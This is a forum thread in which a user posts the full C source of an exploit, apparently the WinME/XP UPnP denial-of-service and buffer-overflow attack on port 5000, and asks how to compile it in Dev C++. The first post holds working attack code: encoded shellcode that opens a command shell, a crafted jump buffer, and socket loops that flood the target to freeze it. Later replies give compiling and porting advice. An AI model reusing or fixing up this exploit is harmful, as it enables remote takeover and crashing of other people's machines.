Help C++ application
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Help C++ application

  1. #1
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795

    Help C++ application

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #include <fcntl.h>

    #define MAX 10000
    #define PORT 5000
    #define FREEZE 512
    #define NOP 0x43 //inc ebx, instead of 0x90

    /***************************************************************************/

    int main(int argc,char *argv[])
    {
    int sockfd[MAX];
    char sendXP[]="XP";
    char jmpcode[281], execode[840],request[2048];
    char *send_buffer;
    int num_socks;
    int bindport;
    int i;
    int port;

    unsigned char shellcode[] =
    "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
    "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
    "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
    "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
    "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
    "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
    "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
    "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
    "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
    "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
    "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
    "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
    "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
    "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
    "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
    "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
    "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
    "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
    "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
    "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
    "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
    "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
    "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
    "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
    "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
    "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
    "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
    "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
    "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
    "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
    "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
    "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
    "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
    "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
    "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
    "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
    "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
    "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
    "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
    "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
    "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
    "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
    "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
    "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
    "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
    "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
    "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
    "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
    "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
    "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
    "\x68\x68\x68\x68";
    struct hostent *he;
    struct sockaddr_in their_addr;


    if(argc!=3)
    {
    fprintf(stderr,"usage:%s <hostname> <command>\n",argv[0]);
    fprintf(stderr,"-f freeze the machine.\n");
    fprintf(stderr,"-e exploit.\n");
    exit(1);
    }


    if(strstr(argv[2],"-f")) {
    num_socks=FREEZE;
    send_buffer=sendXP;
    }

    if(strstr(argv[2],"-e")) {
    num_socks=1;
    send_buffer=request;
    bindport^=0x9797;
    shellcode[778]= (bindport) & 0xff;
    shellcode[779]= (bindport >> 8) & 0xff;

    for(i = 0; i < 268; i++)
    jmpcode[i] = (char)NOP;

    jmpcode[268] = (char)0x4d;
    jmpcode[269] = (char)0x3f;
    jmpcode[270] = (char)0xe3;
    jmpcode[271] = (char)0x77;
    jmpcode[272] = (char)0x90;
    jmpcode[273] = (char)0x90;
    jmpcode[274] = (char)0x90;
    jmpcode[275] = (char)0x90;

    //jmp [ebx+0x64], jump to execute shellcode
    jmpcode[276] = (char)0xff;
    jmpcode[277] = (char)0x63;
    jmpcode[278] = (char)0x64;
    jmpcode[279] = (char)0x90;
    jmpcode[280] = (char)0x00;

    for(i = 0; i < 32; i++)
    execode[i] = (char)NOP;
    execode[32]=(char)0x00;
    strcat(execode, shellcode);

    snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode);
    }

    if((he=gethostbyname(argv[1]))==NULL)
    {
    perror("gethostbyname");
    exit(1);
    }


    /***************************************************************************/

    for(i=0; i<num_socks;i++)
    if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
    perror("socket"); exit(1);
    }


    their_addr.sin_family=AF_INET;
    their_addr.sin_port=htons(PORT);
    their_addr.sin_addr=*((struct in_addr*)he->h_addr);
    bzero(&(their_addr.sin_zero),8);



    for(i=0; i<num_socks;i++)
    if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
    {
    perror("connect");
    exit(1);
    }


    for(i=0; i<num_socks;i++)
    if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
    {
    perror("send");
    exit(0);
    }


    for(i=0; i<num_socks;i++)
    close(sockfd[i]);


    return 0;
    }
    Now when I go to execute tab in Dev C++, then compile I get the following errors. My question is what do I need to do or modify to get this code to work. make a file? Directory? I'm still very new to C++ all help is appreciated thank you Computer Nerd22
    Share on Google+

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Haha! C++ "application", yes well, I never really concidered a bufferoverflow exploit an application...

    Now when I go to execute tab in Dev C++, then compile I get the following errors.
    No errors? What's the problem then!?

    Besides, this seems like a unix prog which you're trying to build in windows (Dev C++ is windows right?). Find a widows version or port it yourself.


    Ammo
    Credit travels up, blame travels down -- The Boss
    Share on Google+

  3. #3
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    I get the following errors.
    Wich errors ??

    it compiled fine with my GCC (Slackware 9)

    But it might not be a realy apropriate piece of sourcecode !!
    with that shellcode and all..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !
    Share on Google+

  4. #4
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    /*
    * WinME/XP UPNP dos & overflow
    *
    * Run: ./XPloit host <option>
    *
    * Windows run the "Universal Plug and Play technology" service
    * at port 5000. In the future this will allow for seemless
    * connectivity of various devices such as a printer.
    * This service have a DoS and a buffer overflow I exploit here.
    *
    * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
    *
    * Author: Gabriel Maggiotti
    * Email: gmaggiot@ciudad.com.ar
    * Webpage: http://qb0x.net
    */
    taken from packetstorm?
    yeah, I\'m gonna need that by friday...
    Share on Google+

  5. #5
    Senior Member
    Join Date
    Jul 2002
    Posts
    315
    I would have to agree with ammo. Some of the syntax doesn't look right for a windows machine. In fact I compiled it and got about 102 errors after commenting out a few headers I figured are external.

    The errors seems to stem from the format of the shellcode.

    I hope that helps. If I could be of anymore help pm me.

    Guidance...
    - The mind is too beautiful to waste...
    Cutty

    Share on Google+

  6. #6
    Banned
    Join Date
    Mar 2002
    Posts
    594
    Now when I go to execute tab in Dev C++, then compile I get the following errors. My question is what do I need to do or modify to get this code to work. make a file? Directory? I'm still very new to C++ all help is appreciated thank you Computer Nerd22
    tampabay420, I don't think he was trying to claim it as his but thanks for pointing that out....

    And as for the source... I got lost halfway through...can't help you.
    Share on Google+

  7. #7
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    Originally posted here by jaguar291


    tampabay420, I don't think he was trying to claim it as his but thanks for pointing that out....

    And as for the source... I got lost halfway through...can't help you.
    maybe i should've made my-self a bit more clear... I don't care who wrote it.. but it is an exploit... just pointing out wich one, et cetera... sorry jag
    yeah, I\'m gonna need that by friday...
    Share on Google+

  8. #8
    Senior Member
    Join Date
    Feb 2003
    Posts
    109
    For some reason I have found that gcc is much more lenient than most other c compilers because it doesn't compile strict ANSI by default. In ANSI C, you cannot have multi-line string literals. I shake my proverbial fist at all those sploit makers who don't realize that there are other compilers out there (even if gcc is better).
    $person!=$kiddie or die(\"Alas, die you hotmail hacker!!\");
    SecureVision
    Share on Google+

  9. #9
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795
    Ok members heres the error's I get when trying to compile this exploit


    line 23 netdb.h no such file or directory
    line 25 netinet\in.h no such file or directory
    line 26 sys\socket.h no such file or directory
    line 27 sys\wait.h no such file or directory.


    Do I need to make a directory? A file? help thanks
    Share on Google+

  10. #10
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Ammo, IMHO, is exactly correct, this is what should clue you in:

    #include <sys/socket.h>

    This is what you will see whenever it is meant to be compiled in unix. Your mileage may vary on how well it works depending on which tcp/ip stack it was written for, but generally you are better of with a BSD style platform (ie, linux). Of course, if you know what you are doing you can always port it (like I sometimes have to for Solaris).

    If it had been a windows platform, you would see (or something to the effect):

    #include <winsock.h>

    Windows has its own socket stuff (winsock), go leave it to microsoft to do things differently huh? Unless something has changed that is...

    Anyway, my $0.02 are in ...

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •